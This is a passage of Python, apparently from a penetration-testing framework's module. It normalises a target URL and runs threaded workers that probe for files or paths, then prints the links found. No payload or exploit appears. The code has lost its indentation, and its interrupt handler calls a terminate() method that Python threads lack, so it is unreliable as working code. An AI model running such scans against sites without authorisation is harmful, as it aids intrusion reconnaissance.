self.url = self.url[:-1]
self.filechecker(self.url)
if not self.url.endswith('/'):
self.url = self.url + '/'
########################################
threads = []
for i in range(self.thread):
t = Thread(target=self.worker)
threads.append(t)
t.start()
for t in threads:
t.join()
except KeyboardInterrupt:
for t in threads:
if t.isAlive():
t.terminate()
pass
if len(self.success) > 0:
self.frmwk.print_success('Found list:\n-----------')
for link in self.success:
self.frmwk.print_success(link)
else:
self.frmwk.print_error('---------\nNot Found!\n---------')
